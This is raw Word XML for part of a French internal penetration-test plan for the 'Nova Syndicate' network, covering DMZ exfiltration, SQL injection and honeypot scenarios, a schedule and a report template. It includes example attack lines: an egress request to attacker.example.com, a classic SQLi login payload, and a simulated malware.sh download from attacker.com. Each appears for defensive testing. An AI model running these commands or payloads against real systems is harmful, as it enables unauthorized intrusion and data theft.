        <w:t xml:space="preserve">- Scan nmap : majoritairement bloqué + Suricata alerte.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T1021 Remote Services, T1018 Remote System Discovery.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="42"/>
    <w:bookmarkStart w:id="43" w:name="X74f17116826195e7f6039f34001f1471518184a"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.8 Scénario S8 — Tentative exfiltration depuis DMZ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vérifier que la DMZ ne peut pas exfiltrer vers Internet.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Sur Web-01 (DMZ)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http://attacker.example.com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3 8.8.8.8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google.com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Toutes les requêtes sortantes depuis DMZ → bloquées par OPNsense (egress filter).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Le DNS sortant peut être autorisé selon config (à valider).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T1041 Exfiltration Over C2 Channel, T1071.001 Application Layer Protocol Web.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="43"/>
    <w:bookmarkStart w:id="44" w:name="X3d45f9304c2c69eda0c683fd2303cdb36b64ada"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.9 Scénario S9 — Test SQL injection sur portail web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identifier si le portail web Nova est vulnérable à des injections SQL.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manuel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"https://192.168.1.166/login?user=admin' OR '1'='1&amp;pass=x"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Test sqlmap (automatique)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w: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"https://192.168.1.166/search?q=test"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Application utilisant requêtes paramétrées → pas d’injection.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Sinon : finding critique → corriger immédiatement.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T1190 Exploit Public-Facing Application, T1213 Data from Information Repositories.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="44"/>
    <w:bookmarkStart w:id="45" w:name="Xce33862eb1d9492c14ef8d08f009c2291a7005a"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.10 Scénario S10 — Test du honeypot Cowrie (si déployé)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valider la capacité de leurre et de détection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Méthodologie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Connexion SSH au honeypot (depuis VPN)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root@10.1.5.40</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Une fois "connecté" (Cowrie simule un shell) :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http://attacker.com/malware.sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Findings attendus</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Cowrie capture chaque commande tapée.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Wazuh reçoit l’alerte (intégration Wazuh-Cowrie).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- L’attaquant ne peut pas exfiltrer réellement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Mapping ATT&amp;CK</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: T1078 Valid Accounts (faux positif simulé).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lanning-dexécution"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6. Planning d’exécution</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="47" w:name="calendrier-jeudi-du-sprint"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.1 Calendrier (jeudi du sprint)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Activité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14h00-14h30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Préparation environnement test, mise à jour outils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14h30-15h30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Scénarios S1-S2 (reco externe + brute SSH)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15h30-16h30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Scénarios S3-S4 (web + OpenVPN)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16h30-17h30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Scénarios S5-S6 (énumération AD + Kerberoasting)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17h30-18h00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Scénarios S7-S8 (mouvement latéral + exfiltration DMZ)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18h00-18h30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Scénarios S9-S10 (SQLi + honeypot)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18h30-19h00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Captures de preuves + clean-up</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="47"/>
    <w:bookmarkStart w:id="48" w:name="durée-totale-estimée-5-heures"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.2 Durée totale estimée : 5 heures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format-du-rapport-final"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7. Format du rapport final</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="50" w:name="X92726fd6e7175495bdf4e6bfe61da52f363a126"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.1 Structure du rapport (à produire après les tests)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">RAPPORT DE TEST D'INTRUSION — NOVA SYNDICATE</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">============================================</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">1. RÉSUMÉ EXÉCUTIF</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Synthèse 1 page pour décideurs.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Score sécurité global (note /10).</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Top 3 vulnérabilités critiques.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">2. PÉRIMÈTRE ET MÉTHODOLOGIE</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Périmètre testé (cf. §3 ci-dessus).</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Méthodologie (PTES + OWASP + CVSS).</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Conditions de tests.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">3. SYNTHÈSE DES VULNÉRABILITÉS</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Tableau récapitulatif par sévérité.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Mapping MITRE ATT&amp;CK des techniques utilisées.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">4. DÉTAIL DES FINDINGS</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   Pour chaque vulnérabilité :</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Titre + ID interne (PT-001, PT-002, ...)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Sévérité CVSS 3.1 (score + vecteur)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Description technique</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Preuve d'exploitation (screenshot / output)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Impact métier</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Recommandation de remédiation</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Effort estimé (h/j)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Priorité</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">5. RÉSULTATS DES TESTS DE DÉTECTION</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Pour chaque attaque : Wazuh / Suricata / Fail2ban a-t-il détecté ?</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Tableau : événement attendu / événement reçu.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">6. POINTS POSITIFS IDENTIFIÉS</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Mesures de sécurité efficaces observées.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">7. ROADMAP DE REMÉDIATION</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Priorisation par criticité.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Calendrier suggéré.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">8. ANNEXES</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Captures d'écran complètes.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Logs détaillés.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Outputs des outils.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="50"/>
    <w:bookmarkStart w:id="51" w:name="template-de-finding"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.2 Template de finding</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">### PT-XXX — [Titre court de la vulnérabilité]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Champ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Valeur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**Sévérité**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Critical / High / Medium /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**CVSS 3.1**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7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)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**Composant**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(ex: OPNsense Lyon, Bastion-01)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**CWE**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(ex: CWE-89 SQL Injection)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**ATT&amp;CK**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(ex: T1190)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 découverte**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YYYY-MM-DD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**Description** :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détaillée du problème en termes techniques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**Preuve d'exploitation** :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[Commande</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> exécutée]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[Capture d’écran ou output]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</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[Conséquence si exploitée]</w:t>
      </w:r>
    </w:p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t xml:space="preserve">[Action corrective concrète + URL doc référence si applicable]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Effort estimé</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: X heures</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Priorité</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: P1 / P2 / P3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éférentiels-dévaluation"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8. Référentiels d’évaluation</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="53" w:name="score-global-du-système"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.1 Score global du système</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Note finale sur 10 selon répartition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458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Méthode d’évaluation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 périmètre (firewall, NAT, IDS)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Findings catégorie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 &amp; accès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  <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Findings catégorie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applicative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  <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Findings catégorie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réseau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  <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Findings catégorie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&amp; monitoring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  <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Capacité Wazuh à détecter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Résilience (PCA/PRA)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Cf. tests PRA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="53"/>
    <w:bookmarkStart w:id="54" w:name="indicateurs-cibles"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.2 Indicateurs cibles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High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">≤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Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">≤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Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">≤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attaques par Wazuh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">≥ 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attaques par Suricata</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">≥ 60 % (depuis WAN)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global</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">≥ 7/10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ions-du-plan"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9. CONCLUSIONS DU PLAN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ce plan définit l’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">exécution méthodique</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">d’un test d’intrusion en mode self-pentest sur l’infrastructure Nova Syndicate. Il :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Couvre</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3 angles d’attaque</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(externe, interne authentifié, interne compromis).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Implémente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">10 scénarios</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">d’attaque couvrant le périmètre exposé.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">S’appuie sur des</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">outils éprouvés</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">de la profession.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Suit les</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">standards reconnus</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(PTES, OWASP, CVSS, MITRE ATT&amp;CK).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Produit un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">rapport final structuré</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">valant livrable client.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le rapport final sera intégré au dossier de mission consulting comme</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">preuve de la posture sécuritaire</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">atteinte par l’infrastructure déployée.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Plan arrêté à la version 1.0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Mai 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Document à compléter par le rapport final post-tests (jeudi).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2026-05-13T10:00:30Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-13T10:00:30Z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